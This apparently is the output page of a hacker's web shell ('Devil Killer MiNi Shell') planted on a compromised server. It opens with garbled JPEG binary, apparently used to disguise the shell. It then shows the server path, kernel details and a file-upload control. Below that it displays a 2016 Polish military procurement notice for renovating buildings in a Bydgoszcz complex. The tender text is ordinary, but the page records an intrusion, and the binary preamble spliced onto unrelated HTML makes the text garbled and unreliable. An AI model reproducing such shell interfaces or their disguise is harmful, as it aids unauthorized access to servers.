JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160429/108790-N-2016.html

<p class="kh_header"><b>Bydgoszcz: Roboty remontowe budynków nr 19 (techniczny), 27, 38 (magazynowe) oraz ogrodzenia przy budynku nr 37 w kompleksie wojskowym przy ul. Fabrycznej 16 na terenie RZI w Bydgoszczy</b><br>
<b>Numer ogłoszenia: 108790 - 2016; data zamieszczenia: 29.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd  Infrastruktury , ul. Podchorążych 33, 85-915 Bydgoszcz, woj. kujawsko-pomorskie, tel. 261 413 876/261 414 285.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzibydgoszcz.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Państwowa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty remontowe budynków nr 19 (techniczny), 27, 38 (magazynowe) oraz ogrodzenia przy budynku nr 37 w kompleksie wojskowym przy ul. Fabrycznej 16 na terenie RZI w Bydgoszczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Element I - Remont pomieszczeń w części piwnicznej budynku nr 19 (warsztat stolarski).
Roboty remontowe obejmują:
Prace remontowe wewnętrzne
Demontaż 2 szt. metalowych przegród (ścianek) z osadzonymi metalowymi skrzydłami  drzwiowymi  3 szt.,
Demontaż drzwi drewnianych i osadzenie nowych drzwi pełnych klasycznych,
Renowacja i przemalowanie 3 szt. metalowych skrzydeł drzwiowych wraz z ościeżnicami oraz wymiana zamków,
Renowacja, przemalowanie, ocieplenie metalowych, zewnętrznych  drzwi wejściowych i wykonanie kratki nawiewnej oraz wymiana dwóch zamków patentowych,
Zamurowanie na ? cegły dwóch wlotów wsypów na opał i dwóch okien cegłą ceramiczną pełną,
Zamurowanie przejścia rur c.o. z pomieszczenia piwnicy do kanału ciepłowniczego cegłą ceramiczną pełną,
Wymurowanie z otynkowaniem przegrody (ścianki) na grub. ? cegły pełnej z trzema pilastrami z osadzeniem drzwi metalowych wewnętrznych,
Wyrównanie różnicy poziomów posadzek w pomieszczeniach w świetle ościeży,
Zmycie i usunięcie wszystkich luźnych warstw tynku oraz farby ze ścian i sufitów,
Zagruntowanie całych powierzchni pionowych i poziomych,
Wykonanie tynków cementowo  - wapiennych na ściankach zamurowanych wsypów                                   oraz uzupełnienie ubytków tynku,
Zmycie i oczyszczenie posadzek betonowych pomieszczeń oraz po zagruntowaniu uzupełnienie ubytków i dwukrotne pomalowanie farbą chlorokauczukową, 
Dwukrotne przemalowanie pomieszczeń (ściany i stropy) farbą emulsyjną,
Wyrównanie kinety studni schładzającej i jej uszczelnienie oraz zamocowanie uchwytów umożliwiających mocowanie pompy przelewowej,
Oczyszczenie i przemalowanie rur wod-kan i c.o. farbą chlorokauczukową.
Prace remontowe zewnętrzne
Zamurowanie na ? cegły dwóch okien i dwóch pionowych otworów wsypów z wykonaniem tynku cementowo wapiennego,
Wykonanie izolacji przeciwwilgociowej na ścianie budynku we wsypach (trzy wsypy),
Rozkucie betonowych spodów wsypów,
Zasypanie dwóch wsypów gruntem przepuszczalnym z zagęszczeniem,
Wykonanie płyt żelbetowych nad zasypanymi wsypami na poziomie gruntu beton B-20,
Naprawa schodów gruntowych oraz naprawa podestu dolnego  z odwodnieniem (studzienka chłonna z kratką),
Naprawa ułożenia płytek chodnikowych dojścia do schodów 1,4x1,4 m2
Renowacja i przemalowanie stalowej pokrywy wsypu do węzła c.o. 
Roboty elektryczne
Demontaż instalacji natynkowych i rozdzielnicy skrzynkowej
Montaż przewodów w rurkach instalacyjnych n/t,
Montaż opraw oświetleniowych i osprzętu elektrycznego
Montaż rozdzielnicy elektrycznej RP
Montaż instalacji ochrony przeciwporażeniowej - układ zasilania TN-C-S
Wykonanie pomiarów ochronnych
Remont odcinków instalacji wodociągowej i kanalizacyjnej oraz demontaż kotłów parowych typu KZ-5 (2 kpl.) wraz z osprzętem, armaturą i instalacją technologiczną w pom. byłej kotłowni
Demontaż demolacyjny 1 szt. baterii umywalkowej ściennej,
Demontaż 1,5 m rurociągu stalowego ocynkowanego,
Demontaż demolacyjny urządzeń sanitarnych bez korkowania podejść dopływowych i odpływowych - zlew żeliwny - 1 szt.,
Demontaż demolacyjny 1 szt. podejścia odpływ. z rur PCV,
Demontaż demolacyjny 1 szt. pompy ręcznej wraz z zamocowaniem do ściany,
Przebicie otworów w posadzce przy studzience schładzającej wodę w celu wykonania demontażu przewodu stalowego ssącego istniejącej pompy i montażu przewodu z rury stalowej oraz 1 szt. przepustu z rury PCV, 
Demontaż demolacyjny 3,6 m rurociągu  stalowego z rur czarnych,
Montaż zlewu stalowego emaliowanego wraz z wspornikami do zamocowania na ścianie                     oraz z syfonem pojedynczym,
Montaż 2 m rurociągu wraz z z 2szt. podejść dopływowych do baterii,
Montaż 1 szt. baterii zmywakowej ściennej i zaworu czerpalnego,
Montaż 2 m rurociągu kanalizacyjnego z PCV wraz z podejściem odpływowym z PCV,
Zainstalowanie pompy elektrycznej z 3 m kabla, z łącznikiem pływakowym w studzience schładzającej wodę,
Montaż 3,9 m rurociągu stalowego w instalacjach c.o.,
Osadzenie 3 szt. stopni płaskich w studzienkach,
demontaż demolacyjny izolacji z rurociągów ok. 12 m2,
odłączenie 2 szt. kotłów żeliwnych parowych typu KZ-5, ich demontaż i rozebranie,
demontaż osprzętu kotłów, armatury,
demontaż instalacji technologicznej kotłów.
Element II - Remont elewacji i pokrycia dachowego z wymianą instalacji odgromowej  oraz wymiana stolarki okiennej i drzwiowej budynku nr 27 (magazyn ogónl. przezn.).
Roboty remontowe obejmują:
Remont pokrycia dachowego 
Drobne naprawy pokrycia papowego,
Wymiana 25 cm pasa papy wzdłuż rynien, wymiana fartucha rynnowego na wykonany z blachy tytan-cynk,
Wymiana opierzeń ogniomurów na nowe z blachy tytan-cynk, po uprzednim zamocowaniu na płaszczyźnie poziomej płyty OSB,
Zagruntowanie całej powierzchni dachu preparatem gruntującym,
Jednokrotne pokrycie dachu papą wierzchniego krycia typu PYE PV 250 z wywinięciem                             na ogniomury wraz z obróbką wywietrzaków dachowych,
Wymiana instalacji odgromowej,
Odnowienie powłok malarskich obróbek blacharskich z blachy ocynkowanej, rynien z obu stron, pasa podrynnowego, rur spustowych, żaluzyjek wentylacyjnych w ścianie wraz z regulacją przepływu powietrza,
Renowacja ośmiu wentylacyjnych wywietrzaków dachowych,
Wymiana stolarki okiennej i drzwiowej oraz renowacja istniejących bram do magazynów
Wymiana starych metalowych okien na okna witryny z PCV z szybami zespolonymi,
Montaż  podokienników zewnętrznych z blachy tytanowo-cynkowej, 
Wymiana krat we wszystkich otworach okiennych od zewnątrz na kraty proste z siatką, 
Renowacja 9 szt. istniejących metalowych bram rozwiernych i 1 szt. przesuwnej do pomieszczeń magazynu,
Wymiana 1 szt. drzwi zewnętrznych  na drzwi z profili stalowych ocieplanych z zestawem  do plombowania. 
Zasadnicze roboty elewacyjne
Przygotowanie starego podłoża ścian budynku, powierzchni pionowych i poziomych,
Skucie wystającego pogrubienia ściany przyziemia,
Skucie podestu oraz jego odtworzenie z montażem wycieraczki metalowej, 
Zagruntowanie podłoży,
Ułożenie siatki elewacyjnej na pęknięciach ścian i metalowych nadprożach zamurowanych bram,
Montaż systemowych listew w miejscu występowania dylatacji budynku,
Otynkowanie całości budynku tynkiem cementowo wapiennym kat.II,
Po zagruntowaniu wykonanie wyprawy elewacyjnej cienkowarstwowej z tynku mineralnego,
Dwukrotne malowanie elewacji farbą silikonową z zachowaniem numeracji budynku,
Demontaż zadaszeń nad bramami i drzwiami oraz montaż nowych lekkich systemowych krytych dymnym poliwęglanem komorowym.
Roboty elektryczne
Przewody instalacji odgromowej - nienaprężane poziome
Demontaż starej instalacji i wykonanie nowej,
Klejenie wsporników do papy,
Montaż wsporników na ogniomurach i wywietrzakach,
Montaż zwodów poziomych,
Montaż złączy rynnowych.
Przewody instalacji odgromowej - naprężane pionowe (odprowadzające)
Demontaż starej instalacji i wykonanie nowej,
Osadzenie wsporników przelotowych,
Montaż zwodów,
Regulacja przewodów między wspornikami,
Montaż osłon z rur izolowanych,
Wykonanie numeracji zgodnie z metryką.
Instalacje elektryczne
Wymiana opraw oświetleniowych na oprawy szczelne w pomieszczeniach,
Wymiana i montaż nowych opraw typu platfoniera z czujnikiem zmierzchowo - ruchowym nad wrotami i drzwiami wejściowymi do budynku,
demontaż gniazda 230V oraz 3faz i montaż zestawu w obudowie izolacyjnej w rozdzielnicy żeliwnej agregatu mobilnego,
demontaż skrzynki telefonicznej,
wykucie wnęki i osadzenie istniejącej głowiczki telefonicznej oraz zabezpieczenie drzwiczkami rewizyjnymi z napisem -Tel-,
na ścianach elewacyjnych - wkucie przewodów instalacji telefonicznej p/tynk.
Wykonanie pomiarów ochronnych
Element III - Remont elewacji i pokrycia dachowego wraz z wymianą instalacji odgromowej, opierzeń, rynien i rur spustowych oraz wymiana stolarki okiennej                           i drzwiowej budynku nr 38 (magazyn ogóln. przezn.).
Roboty remontowe obejmują:
Remont pokrycia dachowego 
Przemurowanie 4 szt. kominów cegłą pełną oraz wykonanie czap z betonu B-20 z kapinosem,
Sprawdzenie drożności wszystkich przewodów wentylacyjnych,
Wykonanie opierzeń, wywiniętej na komin papy, z blachy tytan-cynk oraz ułożenie na czapach (po ich zagruntowaniu) papy,
Otynkowanie kominów tynkiem mineralnym i przemalowanie farbą silikonową,
Zerwanie starych czterech warstw papy tekturowej na lepiku,
Ułożenie dwuwarstwowo styropianu na całej powierzchni dachu wraz z membraną,
Jednokrotne pokrycie papą wierzchniego krycia typu PYE PV 250 z wywinięciem na ogniomury, 
z przymocowaną wcześniej na płaszczyźnie poziomej ogniomurów, płytą OSB,
Wymiana  instalacji odgromowej, wyłącznika p. poż, rozdzielnicy, wyłącznika czasowego wentylatora i złącza telefonicznego itp. (szczegółowe rozwiązania opisane w robotach elektrycznych), 
Naprawa ubytków ogniomurów,
Podniesienie wysokości ogniomurów poprzez  domurowanie 20 cm cegłą pełną oraz wymiana opierzenia ogniomurów na opierzenie z  blachy  tytanowo-cynkowej,
Wymiana opierzenia  pasa dolnego i fartucha oraz rynny całość z blachy tytan - cynk,
Wymiana czterech rur spustowych z żygaczami.
Wymiana stolarki okiennej i drzwiowej oraz renowacja istniejących bram do magazynów
Wymiana okien zespolonych drewnianych na okna uchylno rozwierne z PCV,
Montaż podokienników zewnętrznych z blachy powlekanej, wewnętrznych z PCV,
Wymiana 2 szt. drzwi zewnętrznych  na drzwi z profili stalowych ocieplanych z zestawem do plombowania,
Wymiana zewnętrznego okratowania wszystkich okien oraz renowacja drabiny metalowej na dach,
Renowacja 2 szt. istniejących metalowych bram do pomieszczeń magazynów.
Zasadnicze roboty elewacyjne
Demontaż lamp mocowanych do ścian budynku i montaż nowych na słupie,
Odbicie luźnych tynków zewnętrznych,
Skucie luźnych elementów z cegły lub betonu (mury, ogniomury, podesty, itp.),
Naprawa powierzchni uszkodzonych, 
Przygotowanie  i zagruntowanie starego podłoża ścian budynku, 
Przyklejenie warstwy siatki na ścianach, gzymsach itp.,
Nałożenie podkładowej masy tynkarskiej,
Wyprawa elewacyjna cienkowarstwowa z tynku mineralnego 3 mm,
Dwukrotne malowanie elewacji oraz ścian przyziemia na wysokość 50 cm od opaski farbą silikonową z zachowaniem numeracji obiektu,
Wymiana zadaszeń nad drzwiami i bramami na lekkie systemowe daszki kryte komorowym poliwęglanem dymnym.
Pozostałe prace zewnętrzne
Rozkucie popękanej, opaski betonowej, podestów i dojazdów do magazynów i odtworzenie z kostki betonowej,
Rekultywacja przyległego terenu zielonego,
Renowacja obudowy, czerpni i wyrzutni wentylatora zewnętrznego,
Renowacja studzienki telekomunikacyjnej,
Renowacja terenu zielonego w najbliższej odległości od budynku do ok. 2,5 m.
Roboty elektryczne
Przewody instalacji odgromowej - nienaprężane poziome
Demontaż starej instalacji i wykonanie nowej,
Klejenie wsporników do papy,
Montaż wsporników na ogniomurach, kominach i wywietrzakach,
Montaż zwodów poziomych,
Wykonanie instalacji piorunochronnej kominów,
Podłączenie rur wywiewnych instalacji sanitarnych,
Montaż złączy rynnowych.
Przewody instalacji odgromowej - naprężane pionowe (odprowadzające)
Demontaż starej instalacji i wykonanie nowej,
Osadzenie wsporników przelotowych,
Montaż zwodów,
Regulacja przewodów między wspornikami,
Montaż złączy kontrolnych,
Wymiana na bednarkę odcinka uziomu otokowego (złącze kontrolne),
Uziemienie konstrukcji wentylatora wyciągowego z uziomem otokowym,
Montaż osłon z rur izolowanych,
Wykonanie numeracji zgodnie z metryką.
Instalacje elektryczne
Wymiana opraw oświetleniowych na oprawy szczelne w pomieszczeniach i korytarzu,
Montaż oprawy oświetleniowej w przedsionku nad rozdzielnicą,
Wymiana i montaż nowych opraw typu platfoniera z czujnikiem zmierzchowo - ruchowym nad drzwiami wejściowymi do budynku,
montaż przycisku ppoż przy drzwiach wejściowych do części administracyjnej z tabliczką Wyłącznik główny przeciwpożarowy,
montaż kasety ,załącz - wyłącz, przy drzwiach wejściowych do magazynu środków chemicznych  z trwałym opisem PRZEWIETRZANIE POMIESZCZENIA oraz ułożeniem p-t przewodu zasilającego po zewnętrznej ścianie budynku,
wymiana przewodu n/t do podgrzewacza,
wymiana rozdzielnicy żeliwnej na izolowaną z podłączeniem istniejących obwodów,
demontaż skrzynki telefonicznej,
wykucie wnęki i osadzenie istniejącej głowiczki telefonicznej oraz zabezpieczenie drzwiczkami rewizyjnymi z napisem -Tel,
na ścianach elewacyjnych - wkucie przewodów instalacji telefonicznej p/tynk,
demontaż dwóch wysięgników z oprawami ze ścian elewacyjnych,
demontaż kabla oświetleniowego ze ściany i ułożenie w rowie kablowym,
montaż stanowiska oświetleniowego na słupie aluminiowym typu SAL 70 w odległości ok. 10m od budynku.
Wykonanie pomiarów ochronnych
Element IV - Remont ogrodzenia przy budynku nr 37.
Rozebranie elementów metalowych i betonowych istniejącego ogrodzenia (ramki metalowe z siatką  i słupki do odzysku), 
Odtworzenie ogrodzenia jako prefabrykowane panelowe powlekane lub malowane proszkowo w kolorze zielonym (słupki 60x40, wysokość ogrodzenia min. 1800 mm (razem z cokołem), grubość drutu min. 5 mm)
Odtworzenie dwóch furtek zamykanych na klucz patentowy szer. 100 cm,
Renowacja i wzmocnienie istniejących dwóch skrzydeł bramy,
Odtworzenie terenu zielonego po wykonaniu w/w prac,
Wywiezienie gruzu na wysypisko i przekazanie zdemontowanych części metalowych użytkownikowi..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium na poszczególne elementy w  wysokości: Element I- 1.300 zł.  Element II- 6.000 zł., Element III - 3.000 zł,</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia zobowiązany jest spełniać wymogi ustawy z dnia 14 grudnia 2012 r. o odpadach  (Dz. U. z 2013 poz. 21 - tekst jedn. ze  zm.)
Warunek oceniony zostanie na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia zobowiązany jest wykazać się następującą wiedzą i doświadczeniem:
Dla Elementu I - Wykonawca wykaże co najmniej 1 robotę zrealizowaną w okresie ostatnich 5 lat o podobnym charakterze i wielkości (remont pomieszczeń) o wartości nie mniejszej niż 30 tys. zł każda, popartą referencjami potwierdzającymi należyte jej wykonanie. Wykaz powinien zawierać: opis zamówienia, wartość umowy, termin realizacji, adres i nr telefonu Zamawiającego.
Dla Elementu II - Wykonawca wykaże co najmniej 1 robotę zrealizowaną w okresie ostatnich 5 lat o podobnym charakterze i wielkości (remont elewacji, remont pokrycia dachowego wraz z wymianą instalacji odgromowej - niekoniecznie w ramach jednej umowy) o wartości nie mniejszej niż 100 tys. zł każda, popartą referencjami potwierdzającymi należyte jej wykonanie. Wykaz powinien zawierać: opis zamówienia, wartość umowy, termin realizacji, adres i nr telefonu Zamawiającego.
Dla Elementu III - Wykonawca wykaże co najmniej 1 robotę zrealizowaną w okresie ostatnich 5 lat o podobnym charakterze i wielkości (remont elewacji, remont pokrycia dachowego wraz z wymianą instalacji odgromowej - niekoniecznie w ramach jednej umowy) o wartości nie mniejszej niż 60 tys. zł, popartą referencjami potwierdzającymi należyte jej wykonanie. Wykaz powinien zawierać: opis zamówienia, wartość umowy, termin realizacji, adres i nr telefonu Zamawiającego.
Dla Elementu IV - Wykonawca wykaże co najmniej 1 robotę zrealizowaną w okresie ostatnich 5 lat o podobnym charakterze i wielkości (remont ogrodzenia panelowego z siatką) o wartości nie mniejszej niż 10 tys. zł, popartą referencjami potwierdzającymi należyte jej wykonanie. Wykaz powinien zawierać: opis zamówienia, wartość umowy, termin realizacji, adres i nr telefonu Zamawiającego.
Warunek oceniony zostanie na podstawie oświadczenia oraz złożonych dokumentów .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu w tym zakresie. Warunek oceniony zostanie na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunku wykonawca musi wykazać się dysponowaniem osobami legitymującymi się kwalifikacjami odpowiednimi do stanowisk, jakie zostaną im powierzone:
Kierownik budowy, posiadający uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno - budowlanej oraz przynależność do Izby Inżynierów Budownictwa -  dla elementów I - IV
Kierownik robót branży elektrycznej, posiadający uprawnienia budowlane w ograniczonym zakresie w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz przynależność do Izby Inżynierów Budownictwa  - dla elementów I - III
Kierownik robót branży sanitarnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych, kanalizacyjnych i gazowych w ograniczonym zakresie oraz przynależność do Izby Inżynierów Budownictwa - dla elementu I
Wykaz osób, które będą uczestniczyły w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia oraz informacją o podstawie do dysponowania tymi osobami -  dla elementów I - IV
 Warunek oceniony zostanie na podstawie oświadczenia oraz złożonych dokumentów .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu w tym zakresie. Warunek oceniony zostanie na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>W celu potwierdzenia spełniania warunku udziału w postępowaniu określonego w art. 22 ust. 1 pkt.2 ustawy Pzp Zamawiający żąda, aby w wykazie zostały zamieszczone zadania potwierdzające spełnianie warunku wiedzy i doświadczenia.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
